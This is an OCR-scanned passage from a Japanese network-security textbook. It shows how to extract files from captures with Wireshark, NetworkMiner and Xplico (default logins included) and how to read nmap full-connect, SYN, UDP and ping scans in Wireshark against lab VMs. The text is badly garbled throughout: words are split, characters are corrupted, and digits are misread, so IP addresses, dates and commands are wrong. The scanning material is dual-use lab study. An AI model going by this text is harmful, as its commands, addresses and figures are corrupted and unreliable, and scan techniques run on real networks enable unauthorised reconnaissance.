rk S 1 ・:e う .hit は す 全 の 0 h 


・.D)&9.. 5 .-Y、<0v.1.8..6..>5...K.. ft.Pa、 .KCf. "て...(.)- . 
写 3gy292: .%、WP ーーy1Z。 > 。 >。 。, PR も,/。 Wi 本 .@*.6. 
*9. 。b,. 由 ST .00( . .A。 。 .@..Je.*S4G.…9., 。 ev 王 。 。_ ュ 。 

た が だ る es まき #、。 31 .H- .H. 


SI 
ET 。。 


し ナド し LT aro- Dend/exerc3se. 917。 の " ナ - ザ の gk 
。bO。。H3DPy. 。)。。 8- - - - -W。 -=- 。RR。 。 。。 。 。 。 。 嘱 評 「 葉 
t 9:2 
日 


生 
| 





(WW .f[, 1 CC 1 ASCII で 拡張 子 を 識別 し に くい 場合 
時 ee 
PT Te 本 は seeee 





ファ イル を 抽出 する と き は 、 「RAW」 に 変更 
し て か ら 、[Save as] ボタ ン を 押し ます 。 


図 6.8 TCP Stream か ら の ファ イル の 抽出 


以上 で 、Wireshark を 使っ て デー タス トリ ー ム を 抽出 で きま し た 。 し か し な が 
ら 、 少 々 手間 が か か り ま し た 。 デ ー タ スト リー ム を エク スポ ー ト する こと が 目的 
で あれ ば 、NetworkMiner が 便利 で す 。 pcap ファ イル を 読み 込む な と 、 自動 的 に ファ 
イル を 識別 し て くれ ます 。 フ ァイル 名 (拡張 子 を 含む ) が 表示 され 、 抽 出 も で き 
ます ( 図 6-9)。 


NetworkAMiner 


https://www.netresec.com/index.ashx?page 王 NetworkMiner 





*6 : 拡張 子 を 識別 する た め に は 、 フ ァイル ヘッ ダー の 識別 子 を 読み 取り ます 。11.6 を 参照 し て く 
だ さい 。 
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= Js - 3 に 1 に 1 Fi に nsms MDS 
ー Cerr semcitiue |EzactFfrass マ | Pr coums jlegJ「 Ap sepcap 。 「17250cb 。 


Ex1erson Se Seuce host 
enttlgmesnlclgirt txt +242B 23』 ァ 3051 [=309Tg ュ Esmsiscgsireltl [na で om=d-. 
emlemenefegl]rr rwt 242 邊 2487190II [09Teakamsieeeeret] [sen aue om ad. 
コー | 和 Q 1348 163142.121 





図 6-9 NetworkMiner で の ファ イル 一 覧 


な お 、NetworkMiner は 、pcapng フ ァイル を サポ ー ト し て いな い の で 、 事 前 に 
pcap フ ァイル に 変換 し て お きま す 。 ま た 、pcap ファ イル が 大 きす ぎる と フリ ー ズ 
する 可能 性 が あり ます 。 そ の と き は 、editcap や SplitCap で pcap ファ イル を 分 割 し 
ます 。 前 者 は Wireshark に 含ま れ て いて お り 、 後 者 は NetworkMiner を リリ ー ス し 
て いる Netresec 社 が 配布 し て いま す 。 


代 Xplico に よる キャ プチ ャ ファ イル の 分 析 


Wireshark で キャ プチ ャ ファ イル を 読み 込め ば 、GUI で 通信 内 容 を 解析 で きま 
す 。 Wireshark は 通信 の 流れ や ビッ ト 列 な ど を 分 析 す る に は 向い て いま す が 、 画 像 
や メー ル な ど を 解析 する の に は 不向き と いえ ます 。 

Xplico は GUI で 操作 で きる ネッ トワ ー ク 分 析 ツ ー ル で す 。 キャ プチ ャ ファ イル 
を 解析 し た り 、 リ アル タイ ム に パケ ッ ト を 解析 し た り で きま す 。 


Xplico Xplico 店 


https://wwwrxplico.org/ http://wikixplico.org 





VirtualBox の 仮想 マシ ン と し て 、Ubuntu + Xplico の ova フ ァイル も 提供 され て 
いま す (7)。 こ こ で は 、Kali に Xplico を イン スト ー ル し て 簡易 的 に 用 いる よう に 


7: キャプ チャ ファ イル が 巨大 な サイ ズ で ある と 解析 に 時 間 が か か り ま す 。 さらに 、 複 数 人 で 
Xplico を 利用 し た い の で あれ ば 、Xplico が イン スト ー ル され た 解析 専用 の サー バー を 用 意 し て 、 
ネッ トワ ー ク 経由 で アク セス で きる よう に し た 方 が よい と いえ ます 。 
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し まま び 。 
1 Xplico を イン スト ー ル する 


Kali に Xpliico を イン スト ー ル し ます 。 


Foot 同 kal1:< 韻 apt 1nstall xplico -y 


2)Xplico の Web ペー ジ を 表示 する 
イン スト ー ル が 完了 し た 時 点 で 、Xplico の Web ペー ジ が 生成 され ます 。 


次 の コマ ンド を 入力 し て Apache を 起動 し ます 。 


FOOot 仙 ka11<# service apache2 restar て 


その 後 、Firefox を 起動 し て 、http://localhost9876 に アク セス し ます 。 し か し 、 
まだ Xplico は 起動 し て いま せん ( 図 6-10)。 


で |Q Search 立 自 * 合 ウ 


を 〇 ①|Iocalhost 38 76 
Most Visitedy 証 Offensive Securty MKal Lnux WMKal Docs WKall Tools **.Explot-DB 箇 Alrcrack-nq 


NIIIEI 有 WTD0CIS ラ 


Xplico Is not runningi! 
For startind Xplico, please choose one of these options as root: 


a) If you are usinq the Ubuntu/Deblian package, run: "etc/In 計 .d 


/xplico stai て " 
b) Run: "opbxplico/scrip り sqlite_ demo.sh" 





図 6-10 Xplico が 起動 し て いな いと き の 表 示 


3 Xplico の サー ビス を 起動 する 
Terminal で 次 を 実行 し て 、Xplico の サー ビス を 起動 し ます ("8)。 


FOOt 仙 Ka11:< 昔 /et て て / ュ n ロ ュ t .d/xp11co start 
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④Xplico に ログ イン する 

この 状態 で プラ ウザ を リロ ー ド する と 、 認 証 ペ ー ジ に 切り 替わり ます 。 これが 
表示 され て いれ ば 、Xplico の 起動 に 成功 し て いま す ( 図 6-11) 。 

username に "admin'、 パ スワ ー ド に "xplico" を 入力 し て ログ イン し ます 。 講 語 
で 日 本 語 を 選べ ます が 、 機 械 語 翻 訳 で わか り に くい の で 、 こ こ で は English を 選び 
ま も し な た 。 


を ① | localhost.3876 G QA Search 次 四 まき 含 @ 三 
向 Most Visited マ 請 Offensive Sccurity MKaliLinux MKallDocs Kall Tocls (e Explolt-DB 邊 Aircrack-nq りら 


Xnlico Interface 


ー し LahdUg0 で 一 
Please login 


Usernarme 


Password 


Loqin 





図 6-11 Xplico の 認証 ペー ジ 


寺 の コン トロ ー ル パネ ル 画 面 が 表示 され ます 。 Menu か ら Users を 選択 する 
登録 され て いる ユー ザー が 表示 され ます 。 xplico と いう ユー ザー が 存在 する の 
で 、 こ の ユー ザー で ログ イン し 直し ます 。 


5) キ ャ フチ ャ を 解析 する 

以降 の 流れ は 、 xplico ユ スー ザー で ログ イン し て 、 Case と Session を 作成 し 、 
プチ ャ ファ イル の 人 解析] ある い は 「 リ アル タイ ム に キャ プチ ャ し て 解析 |] と な 
ます 。 

username に xplico 、password に "xplico を 入力 し て ログ イン し ます 。 左 の 
ニュ ー か ら Case を 選び ます 。Case の 作成 時 に は 、DATA ACQUISITION (デー 
タ 解 析 ) と し て 、 次 の どちら か を 選び ます 。 


8 : この コマ ンド が うま くい か な い 場 合 は 、 次 の コマ ンド を 試し て くだ さい 


# /opt/xp]ico/script/sq1ite demo.sh 
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s Uploading PCAP capture fe/S: キャ プチ ャ ファ イル の 解析 ( 後 で ファ イル を 
指定 する ) 
* Live Acquisition : リ アルタ イム の 解析 ( 後 で イン ター フェ ー ス を 指定 する ) 


ここ で は キャ プチ ャ ファ イル を 解析 する の で 、「Uploading PCAP capture file/ 
8 を すす ェ ュ タグ も し ます 。 

「Case name」 (任意 の ケー ス 名 ) 、「External reference」 ( 空 で も よい ) を 入力 し 
て Case を 作成 し ます ("9)。 続け て 、「 Session name」 (任意 の セッ ショ ン 名 ) を 入 
力 し て Session を 作成 し ます 。 

Session を 選ぶ 示 と 、 キ ャ プチ ャ ファ イル (pcap 形 式 ) を アッ プロ ー ド で きま す 。 
アッ プロ ー ド され る と 自動 的 に 解析 され て 、 画 面 に 解析 結果 が 表示 され ます ( 図 
6-12)。 解析 中 の 場合 は その 旨 が ペー ジ に 表示 され ます 。 


を ① localhost 987G/solsrvewl] で 上 QA Search 人 立 向 を す 人 の 
隔 Most Visitedy 肌 Offcnsive Securir WKaliLnex WKaliDocs Kall Tools ** Explol-DB 得 Arcfack-mq 


NIIIEIEIII(uaCIS: 


usik 


1 1 上 han V | La て q』 
| 
ーー 


て ase and Session PCAP-overiP TCP port: 30001。 

naime testcase -> testsesslom Add new pcap file. 

Cap. 5tart Time 2016-07・16 12.27.10 ' ーー っ 

Cap. End Time 2018-07-16 21:46:53 | Browse- Nohfls selectad. 
Status DECODING COMPLETED Upload 


Hos ts | List of al pcap les . 
月 lter 


CAS | [mmwww ) 
Post 10 Numberi) Receive①) 
C@t 42 Contanth に | 』 
Vidieo 0 Video D0 
ml 。 Images 10 lmagos 0 


DNS 
「G っ = 336 
ARP/ICM の AMR 4 





図 6-12 解析 結果 画面 


左側 の メニ ュー か ら 、|「 Web」 > [Images」 を 選 示 と 、 キ ャ プチ ャ ファ イル に 含 
まれ て いた 画像 デー タ が 表示 され ます ( 図 6-13) 。 


9 : Case や Session で 設定 する 文字 列 に 空白 を 含む 場合 、 カ ッ ト さ れ て 詰め られ ます 。 
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Xpllico InterfaCe 


3.SkhOCrmW ぐ In.38kMTB_.nT で ID SSknGemcI9.5ykUr ウ We IP 
ImaQC Co「 FPSOC ImwaoC Gr PaoCc 


図 6-13 画像 デー タ の 表示 





以上 で 、 Xplico の 使い 方 を 簡単 に 紹介 し まし た 。 Xplico に は 他 に も 様々 な 機能 が 
あり ます 。 例え ば 、 メ ー ル 、 IRC、VoIP、 syslog な どの デー タ も 見 や すく 表示 し て 
くれ ます 。 ま た 、 こ こ で は GUI で 操作 し まし た が 、 Terminal 上 で も 操作 で きま す 。 


氏 タン プ ツ ー ル で デー タ を 確認 する 

Wireshark の |Follow TCP Stream」 画面 に て 、|Show and save data as」 で 
[Hex Dump」 に 切り 替え る と 、16 進 ダン プ を 表示 で きま す 。 し か し 、 あ まり 有効 
な アプ ロー チ と は いえ ませ ん 。 そこ で 、 一 度 RAW に 切り 替え て か ら 、|Save as」 
で ファ イル に 出力 し ます (10)。 フ ァイル 名 は traffic.bin と し まし た 。 

その 後 で 、xxd コ マン ド な どの ダン プ ツ ー ル で 内 容 を 確認 し ます 。 


Poot 人 MkKa11:<# xxd tnaffic.bin 
99999999: 1793 9199 39de 4a41 d463 2562 ae4e 8944 ....9.JA.c%b.N.D 
99999919: 242f bb5f 1c49 52b2 1afd fa9ge 91dd 2e2d $/. .IR...... ・・ー 


( 略 ) 


*10 : 複数 の パケ ッ ト を 対象 と し て いる 場合 、 パ ケッ ト が 区 切り な くつ な が っ て し まう こと に 注意 


で く だ さい 。 
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人 @ Wireshark で nmap の ホー トス キャ ン を 解析 する 


nmap に 用 意 さ きれ て いる スキ ャ ン は 様々 で す が 、 代表 的 な スキ ャ ン は 次 の 通り で 
す (11)。 


* TCP フル コネ クト スキ ャ ン 
* TCPSYN ス キャ ン 
sUDP ス キャ ン 

* Ping ス キャ ン 

* FIN ス キャ ン 

s Xmas スキ ャ ン 
sNul ス キャ ン 
sACK ス キャ ン 


準備 と し て 、Kali の 仮想 マシ ン は 標準 ネッ トワ ー ク 構成 で 起動 し ます 。 さ ら に 、 
Metasploitable の 仮想 マシ ン を 起動 し ます ( 図 6-14)。 


Windows 10 
DHCP (ホス ト OS) 
サー リバー 


10.0.0.100 10.0.0.1 








10.0.0.2 10.0.0.5 





Metasploitable 
(ゲス ト OS) 


図 6-14 nmap の パケ ッ ト を キャ プチ ャ する 実験 環境 


11 : https//nmap.org/man/]a/man-port-scanning-techniques.html 
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(① パ バッ ク グ クラ ウン ド で キャ プチ ャ を 開始 する 
Terminal の 操作 も 行う の で 、Wireshark を バッ ク グ ラウ ンド で 起動 し ます 。 
Wireshark の 画面 は 表示 され ます 。 





イン ター フェ ー ス で eth0 (ホス ト オ ン リー ネッ トワ ー ク の 仮想 LAN ア ダ プ 
ター) を 指定 し て キャ プチ ャ を 開始 し ます 。 


(②TCP フ ルコ ネ ク ト スキ ャ ン を 調査 する 

nmap の TCP フル コネ クト スキ ャ ン に つい て 調査 し ます 。 こ れ は 、-sT オ プシ ョ 
ン を 指定 し た と き の ポ ー ト スキ ャ ン で す 。 ポ ー ト 21、22、445 な どの TCP ポー ト 
を 指定 し な けれ ば な り ま せん 。 

ここ で は Windows 10 に 対し て 、 開 いて いる ポ ボート 445 を 指定 し て TCP スキ ャ 
ン し て み ま す 。 





ボー トス キャ ン の パケ ッ ト に 注目 する た め に 、 Wireshark の 表示 フィ ル タ に 「jp. 
addr = ニ = < ター ゲッ ト 端 末 の IP アド レス >」| を 入力 し ます 。 こ うす る と 、 余 計 な 
パケ ッ ト が 表示 され な く な り ま す 。 
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パケ ッ ト 一 覧 部 に ボー トス キャ ン 時 の パケ ッ ト が 表示 され ます ( 図 6-15) (*12) 。 
デー タ の や り 取 り (方 向 と フラ グ ) が わか り ま す が 、 慣 れ な いと 若干 わか り に く 


いと いえ ます 。 


lpaddr == 10.0.0.1 








Protocol Length info 


335 [SYMN] Seq=H win=292H9 Len=H NSS=136G SACK 


で Cf に 6 


に ー ャ ーー こう 





S 9.B964d7693 19.9.9.Z 18.9.9.1 っ 9 43979 - 445 [ACK] SCG-1 ACK ニ 1 Wi に Z 
6 9. り 3 1 .D.( 9 9 .6 。3 坪 うら 33970 45 1 S 1 . 才 還 に | CK ヨコ 3 


り も 4 
デス ョ ae < ーー = < ーー 


図 6.15 TCP フル コネ クト スキ ャ ン 時 の パケ ッ ト ロ グ 


そこ で 、 よ り 見 や すい よう に 、 フ ロー 図 を 表示 し ます 。 メニュー の | Statistics」 
> |「Flow Graph」 を 選ぶ と 、 通信 の や り 取 り が 一 目 瞭 然 に な り ま す 。 ARP な ども 
表示 され る の で 、 こ こ で は ボー トス キャ ン だ け に 注目 する た め に |Flow type」 を 


| TCP Flows」 に し ます ( 図 6-16)。 


Time 


0.51975 げ ょ 
0O000.47609% 
0.03 己 497533 
OOOoS66019 


Fnnrt W mw "IA *【 
し mi t0 dh le Flow iP TK ア Flowm 


の ee | Cloet | USae 





図 6-16 TCP フル コネ クト スキ ャ ン 時 の フロ ー 図 


*12 : その 他 の 余計 な パケ ッ ト が あれ ば 、 パ ケッ ト 一 覧 部 で それ を 選択 し て 有 有 クリ ッ ク し て 
|ignore] を 指定 する と 消え ます 
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4 回 の や り 取 り が 行わ れ て いる こと が わか り ま す 。 
それ で は 、 閉 じ て い る ボー ト に 対し て 、 同 じ ス キャ ン を 行い ます ( 図 6-17)。 


Poo て 個 ka11:< 芋 nmaD -SsT -p 24 19.9.9.5 

Startng Nmap 7.79 ( https : //nmap .org ) at 2918-98-11 99:58 JST 
Nmap scan Peport †or 19.9.9.5 

Host 1s up (9.99928s latency ) . 


PORT STATE SERVICE 
24/t て cp closed priv-mai1 
MAC Address: 98:99:27:8F :BD:89 (Oracle Virtual1Box virtual NIC) 


Nmap done: 1 TP address (1 host up) scanned 1n 9.16 seconds 


月 IP.aGd「 "= 10.0.0.5 


SCOKFCG Destinathon Protocol ーー Info 
+ 麻 : 敵 レ 。 1 .⑬ 1 [' ド 2 | 


Wireshark ・Flow ・ wireshark_eth0- 20180811005935-wYRiel.pcapng 人 @ @ 


10.0.0.2 
10.0.0.5 CO 


0.073096060 Seq =0 
0.073339546 Seq = 3 Ack・ 1 





図 6-17 閉じ て いる ポー ト の 場合 


2 回 の や り 取 り で 終わ っ て いま す 。 
最後 に 、 フ ァ イ ア ウォ ー ル な ど で フ ィ ル タリ ング され て いる ポー ト に 対し て 、 
同じ スキ ャ ン を 行い ます ( 図 6-18)。 


PootQka11:<# nmapD -sT -p 21 19.9.9.1 

Startng Nmap 7.79 ( https ://nmap.org ) at 2918-98-11 99:49 JST 
Nmap scan Peport for 19.9.9.1 

Host 1s up (9.99918s 1atency ) . 
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PORT STATIE SERVTITCE 
21/tcp filtered ftp 
MAC Address: 9A:99:27:99:99:97 (Unknown ) 


Nmap done: 1 TP address (1 host up) scanned in 9.42 seconds 


0.079140230 
0.179633821 





図 6.18 フィ ル タ リ ング され た ポー ト の 場合 


ター ゲッ ト 端 末 か ら 応 答 が あり ませ ん 。 そ の た め 再 度 送信 し て いま す が 、 そ れ 
で も 応答 が あり ませ ん 。 

いずれ の パタ ー ン で も 、 攻撃 端 末 か ら タ ー ゲ ッ ト 端 末 に SYN パ ケッ ト が 送信 さ 
れ て いま す 。 こ れ は 、TCP フ ルコ ネ ク ト スキ ャ ン の 最初 の 挙動 で や もり 、 こ れ に 対 
する 応答 に よっ て ボー ト が 開い て いる か を 判断 し ます 。 


[ター ゲッ ト 端 末 が 起動 ]」 か つ 「 ポ ー ト が 閉じ て いる 」 な ら ば 、 拒 否 (RST/ 
ACT) パケ ッ ト が 返っ て くる 。 そ の と き は ボー ト が 閉じ て いる と 判断 する 。 

*「 タ ー ゲ ッ ト 端 末 が ダウ ン 」 また は 「 フ ィ ル タリ ング され て いる 」 な ら ば 、 応答 
さえ 返っ て こない 。 攻撃 端末 は パケ ッ ト が ター ゲッ ト 端 末 に 届か な か っ た 可能 
性 を 考慮 し て 、 も う 1 回 同じ SYN パ ケッ ト を 送る 。 そ れ で も 応答 が な けれ ば 、 
フィ ル タ リ ング され て いる と 判断 する 。 

*| ターゲット 端末 が 起動 ]」 か つ |「 ポ ボ ポート が 開い て いる 」 な ら ば 、 許 可 (SYN/ 
ACK) パケ ッ ト が 返っ て くる 。 その後 は ACK パ ケッ ト を 送信 し て 、 実 際 に コネ 
クシ ョ ン を 張 ろ うと し 、 通 常 は コネ クシ ョ ン が 確立 する 。 こ の と き 、 nmap は 
ポー ト が 開い て いる と 判断 で きる 。 こ の 流れ は TCP/IP で の 通信 開始 と 同じ 正 
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規 な 手順 で ある 。 その た め 、 サ ービス が 正規 の 流れ で 動作 する か を 確認 で き 、 正 
確 に サー ビス を 特定 で きる 。 し か し 、 タ ー ゲ ッ ト 上 端末 の サー ビス が 「 つ な が っ 
だ た 」 | 拒否 し た ]」 と いう ログ を 記録 する 。 そ の た だ ため 、 ポ ー ト スキ ャ ン が すぐ に 第 
見 し て し まう 。 


3③ TCP SYN スキ ャ ン を 調査 する 
多 に TCP SYN ス キャ ン を 調査 し ます 。 開い て いる ボー ト 445 を スキ ャ ン し て 、 
パケ ッ ト を 確認 し ます ( 図 6-19)。 


root 引 ka11:<# nmap -SS -p 445 19.9.9.1 

Start1ng Nmap 7/.79 ( https : //nmap.org ) at 2918-98-11 91:18 JST 
Nmap scan report for 19.9.9.1 

Host 1s up (9.99925s latency ) . 


PORT STATE SERVICE 
445/tcp open microso 和 ft-ds 


MAC Address: 9A:99:27:99:99:97 (Unknown ) 


Nmap done: 1 TP address (1 host up) scanned 1n 9.27 seconds 


ee 3 皿 に コ - Exprcssion- * 


SOUI て で Destnalion peooo% math Info 





0.083204367 
0.088845222 
0.038916312 





図 6-19 開い て いる ポー ト の 場合 


3 回 の や り 取 り で 終わ っ て いま す 。 2 番目 の や り 取 り ま で は TCP フル コネ クト ス 
キャ ン と 同じ で す 。 こ の 時 点 で ター ゲッ ト 端 末 の ボー ト は 開い て いる と 判断 し 、 
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その 後 RST パ ケッ ト を 送り ます 。 つ まり 、 最初 の SYN パ ケッ ト で 通信 する と 見 せ 
か けつ つ 、 自 分 で RST パ ケッ ト を 送り 、 そ の 通信 を 途中 で 止め て いる わけ で す 。 

TCP フル コネ クト スキ ャ ン で は 0.49 秒 で し た が 、TCP SYN ス キャ ン で は 0.27 
秒 で し た 。 人 通信 を 途中 で 止め て パケ ッ ト の や り 取 り が 少な く な っ て いる の で 、 開 
いて いる ボー ト に 対す る スキ ャ ン は 大 幅 に 時 間 短 縮 さ れ て いま す 。 今回 は 1 つの 
ボー ト だ け な の で どちら の スキ ャ ン も 一 瞬 で 終わ っ て いま す が 、 複 数 の ボー ト や 
ター ゲッ ト 端 末 を 指定 し た 場合 に は その 差 が 大 きく 影響 し ます 。 

それ で は 、 閉 じ て い る ボー ト に 対し て スキ ャ ン し て み ま す ( 図 6-20)。 


Poot 個 ka11:<# nmap -SsS -p 24 19.9.9.5 

Starting Nmap 7.79 ( https : //nmap.org ) at 2918-98-11 91:28 JST 
Nmap scan Peport for 19.9.9.5 

Host 1s up (9.99929s latency ) . 


PORT STATE SERVTICE 
24/tcp closed priv-mai1 
MAC Address: 98:99:27:8F:BD:89 (Oracle Virtual1Box virtual NIC) 


Nmap done: 1 TP address (1 host up) scanned in 9.28 seconds 


「 == 10.0.0.5 


0.08s119121 | 
0.088957306 








図 6.20 閉じ て いる ポー ト の 場合 


これ は TCP フル コネ クト スキ ャ ン と まっ た く 同 じじ 動作 に な っ て いま す 。 ポ ボ ポート 
が フィ ル タ リ ング され て いる と きも る 同様 で す 。 
以上 の よう に 、 ポ ボ ポート が 開い て いる と き に 通信 を 確立 で きる に も か か わら ず 、 
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通信 を 確立 せ ず に RST パ ケッ ト を 送信 し て 、 通信 を 取り や め て いま す 。 そ の た め 、 
TCP ハー フ コ ネ クト スキ ャ ン と も 呼ば れ ま す 。 ま た 、 途 中 で 止め て し まう の で 、 
サー ビス の ログ に 記録 され ませ ん 。 そ の た め 、 ス テル スス キャ ン と も 呼ば れ ま す 。 

な お 、TCP フ ルコ ネ ク ト スキ ャ ン に root 権 限 は 必要 あり ませ ん が 、 TCP SYN ス 
キャ ン で は root 権 限 が 必要 で す 。 nmap コマ ンド の 引数 に スキ ャ ン の 種類 を 指定 
し な か っ た 場合 は 、TCP SYN ス キャン が 自動 で 選択 され ます 。 


(④UDP スキ ャ ン を 調査 する 

UDP ス キャ ン を 調査 し ます 。 最 も よく 利用 され て いる UDP サ ービス と し て 、 
DNS (ボート 53) 、SNMP (ポー ト 161/162) 、DHCP (ボー ト 67/68) が 挙げ られ 
ます 。 例え ば 、Metasploitable で は 、 表 6.5 の UDP サ ービス が 稼働 し て いま す 。 


表 6-5 開い て いる UDP サ ービス 
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paddr == 10.0.0.5 回 -| Expresson 
No. Time Ss Destnaticn ocV_ Po00.2 の 。 


3 日 . 昌 99430 日.9..2 ri ) 問 : 間 に Por て 116 nrOC- 日 Ca]1 (Reply In 4) 
4 8.BB9991289 16.6.6.5 16.6.6.2 Fo「tmap 24 164316 PD B PO ーーー En 3}) 


Wireshark・Flow ・wireshark_eth0- 20180611111643_ououSP.pcapng 


10.0.0.2 
10.0.0.5 Comnnae7e 
+3909 ーー ニー ニー ニー 111 Pormap: V104316 proc-O て at (Repy h 4) 
+3809 ViD316 | 1i1 Portmwwp V104316 poe-O Hr (Call nh 


KT4P DUmmtion umreachabie Port urre ho) 





図 6.21 ポー ト が 開い て いる 場合 


UDP な の で 、 フ ロー 図 の ーー type」 で は |All Flows」 を 指定 し て いま す 。 ま 
た だ た 、 こ うす る と ARP も 表示 る の で 、 パ ケッ ト 一 覧 部 で Ignore を 設定 し て あり 
ます 。 

上 記 の 例 で は 、UDP パ ケッ ト を ター ゲッ ト 上 端末 に 送信 し た と ころ 、 応 答 が あり 
まし た 。 こ の と き は ポー ト が 開い て いる と 判断 し ます 。 た だ し 、 最後 の ICMP ボー 
ト 到達 不能 エラ ー (ICMP port unreachable) (*13) は 、 パ ケッ ト の 方 向 が 逆 で あ 
り 、nmap の ボー ト 識 別 の 判断 材料 に な り ま せん 。 

また 、 フ ィ ル タリ ング され だ ボート に UDP ス キャ ン し て み ま す ( 図 6-22) 。 


Poot 個 ka11:<# nmaD -sU -p 53 19.9.9.1 


Starting Nmap 7.79 ( https : //nmap .org ) at 2918-98-11 12:19 JST 
Nmap scan report for 19.9.9.1 


Host 1s up (9.99918s latency ) . 
PORT STAIE SERVICE 
53/udp openlfi1tered domain 


MAC Address: 9A:99:27:99:99:97 (Unknown ) 


Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds 


*13 : 端末 まで た どり 着い た が 、 ポ ー ト が 開放 きれ て いな いと き に 返さ れる ICMP パ ケッ ト (タイ 
プ が 3、 コ ー ド が 3) で す 。 
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図 6.22 ポー ト が フィ ル タ リ ング され て いる 場合 


フィ ル タ リ ング され る た だ ため 、 タ ー ゲ ッ ト 端 末 が 応答 を 返す こと は あり ませ ん 。 
その た め 、 nmap は 数 回 再 試行 し て 、 そ れ で も 応答 が な けれ ば 、 フ ィ ル タリ ング さ 
れ て いる か も し れ な いと 判断 し ます 。 し か し 、UDP サ ービス に よっ て は 応答 が な 
いも の も あり 、 ポ ボー ト が 開い て いる 可能 性 が あり ます 。 そ の た め 、 nmap は 
| open 操 tered」 と 表示 し ます 。 

閉じ て いる ポート に 対し て UDP ス キャ ン し て み ま す ( 図 6-23) 。 
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目 |paddr =s1000.5 回 に ・ Expression。 + 
Desthnatuon Protocol 





Wireshark Flow wireshark_-eth0- 20180811122912_kBIDOk.pcapnq 


10.0.0.5 Comwmerk 


0.090537383 535 は っ 2050 tsns=0 : 2950 UDP 63511 + 2050 Len=0 


人 ーー … ROD 





図 6.23 ポー ト が 閉じ て いる 場合 


ICMP ボ ー ト 到達 不能 エラ ー (ICMP port unreachable) が 返っ て きた ら 、 ポ ボー 
ト が 閉じ て いる と 判断 し ます 。 

UDP は TCP と 條 い 、 パ ケッ ト の 到達 性 を 保証 し ませ ん 。 そ の た だ ため 、 ス キャ ン 
果 も 信頼 性 に 欠け ます 。 ま た 、 応 答 な し の 場合 は 数 回 試行 する た め 、UDP ス キャ 
ン に は 時 間 が か か り ま す 。 


5) Ping スキ ャ ン を 調査 する 

Ping ス キャ ン を 調査 し ます 。 nmap で Ping ス キャ ン を 実現 する に は 、-sP オ ォ オプ 
ショ ン を 指定 し ます (*14)。Ping ス キャ ン の 実体 は 、Ping で 疎通 確認 する こと で 
す 。 対象 ネッ トワ ー ク の IP アド レス を 総 当 た り で Ping す る こと を Ping ス イー プ 
と 呼び ます 。 

稼働 し て いる IP アド レス に 対し て Ping ス キャ ン す る と 、 次 の よう に 出力 され ま 
す ( 図 6-24)。 


Foot 同 kal1:< 井 nmap -sP 19.9.9.1 

Startng Nmap 7.79 ( https ://nmap.org ) at 2918-98-11 12:55 JST 
Nmap scan Peport for 19.9.9.1 

Host 1s up (9.99963s latency) . 

MAC Address: 9A:99:27:99:99:97 (Unknown ) 

Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds 


*14 :-sP オ プシ ョ ン は 以前 の も の で あり 、 今 は -sn オ プシ ョ ン に な り ま し た 。 英語 の ヘル プ に その 
よう に 記述 きれ て いま す 。 
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目 |APpN a display fter - <Crt- な 





No. TWme S0M(C で Destination Protocol Length Info ia 
1 6.9G9696GOG PCSCOWDu-。 BrOaOCASt ARP 42 wihO ha$ 19.6.8.1? TG11 19.6.8.2 
2 8.869614733  @a:B6:27_ PcsComPu _ 2. ARP 68 16.8.B.1 1s at Ba:B6:27:60:9B :@7 


Wireshark Flow ・wireshark-etn0- 20180911125459_oLFhHu.Pcapng 


PcsCompu-2:85:44 0Oe00r27:00: 
Tns sea eax 


| 
0.000000000 5 Whokhm 10091?TeW1000?2 6 1 、 RFP Wha his 100017 Te 10003 


| 
0000614733 ーー ーー ニーーー ーーーーー Am と 10001atOe0027600007 





図 6-24 稼 財 し て いる 場合 


nmap の 仕様 で は 、LAN 内 の 端末 を 対象 に し た 場合 、ARP 要 求 が 用 いら れ ま す 。 
プロ ー ド キャ スト に ARP 要 求 が 送ら れ 、 タ ー ゲ ッ ト 端 末 が ARP 応 答 を 返し て い 
ます 。 

一 方 、WAN の 端末 を 対象 と し て Ping ス キャ ン す る と き 、nmap は 上 記 の 動き に 
加え て 別 の 動き を し ます 。 こ れ を LAN で 再現 する に は 、-send-ip オプ ショ ン を 指 
定 し ます ( 図 6-25) 。 


PootQka11:<# nmap -sP 19.9.9.1 --send-ip 

Starting Nmap 7.79 ( https : //nmap.org ) at 2918-98-11 12:39 JST 
Nmap scan report for 19.9.9.1 

Host 1s up (9.99958s 1atency ) . 

MAC Address: 9A:99:27:99:99: の 7 (Unknown ) 

Nmap done: 1 TP address (1 host up) scanned in 9.49 seconds 


R IApply dtsplay fer - <Ctrl- な に コ ・| Bepres3ion. + 
Protocol Length Info WE 
ICMP 42 Echo (Ding) request 1d=Ox1eac, seq=G/H, tti=39 (reply 1n 
3 9.66646184『 .9.6. .9.6. 54 43338 - 8B6 【[ACK] Scqd 三 1 Ack=1 Win=1624 Len=6 


4 9.986116844 .@.9. .9.9. 54 TieStamih 『eQUGSt 1d=@xCb2C, 3S6qB/B,。 【【1=51 
5 9.960272794 。9.6. .9.6。 69 Echo (ping) reply 1d=Ox16aC, $S6qQ=6/6, 1=128 (reQuest 


0.00O000000 ] | WCAP: Echo (png) reqveot は =Oxiewc。 soq=OOL NN に 39 (re. 
0.0CO0643558 TCE 43334 > 44) [SYM] 2cq=0 We 1029 Lm-0 55> 1 . 
0.000101847 456 38 っ 80 CK Scqr1 た 4・1 Ws10g Ao TOP- 4333$ + 80 [AOKJ Se Ack_1 Wins1024 し LensO 
0.000116944 1 TWmactamp requect id=0wm2c ca=0W Tete ea McDeb2c ems00. Hi-S 
0.000272794 5 lnlrepy <Oxles sea-GO, CA Echo nd) py dzOqiex eeq=OO tts328 (mw 





図 6-25 稼 則 し て いる 場合 (--sendip オ プシ ョ ン あ り ) 
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プロ ー ド キャ スト に ARP 要 求 を 送り 、ARP 応 答 が あっ た と し ます 。 す る と 、 
ICMP エ コー 要求 、ICMP タ イム スタ ンプ 要求 、 お よび TCP パケ ッ ト (ボー ト 80 
へ の ACK と ポー ト 443 へ の SYN) を 送り ます 。 ターゲット 端末 か ら ICMP エ コー 
応答 、 あ る い は TCP パケ ッ ト が 返っ て くれ ば 、 稼 働 し て いる と 判定 し て いま す 。 
この 環境 で は 、 ポ ボー ト 80 が 開い て いな い の で TCP パケ ッ ト の 応答 は あり ませ ん 
が 、ICMP エ コー 応答 を 返し て いる た め 、 稼 働 し て いる と 判定 し て いま す 。 
稼働 し て いな い 端 末 に 対し て 、Ping ス キャ ン し て み ま す ( 図 6-26)。 


Poott 個 Ka11:< 后 nmap -sP 19.9.9.4 --send-1p 
Starting Nmap 7.79 ( https : //nmap.org ) at 2918-98-11 12:52 JST 
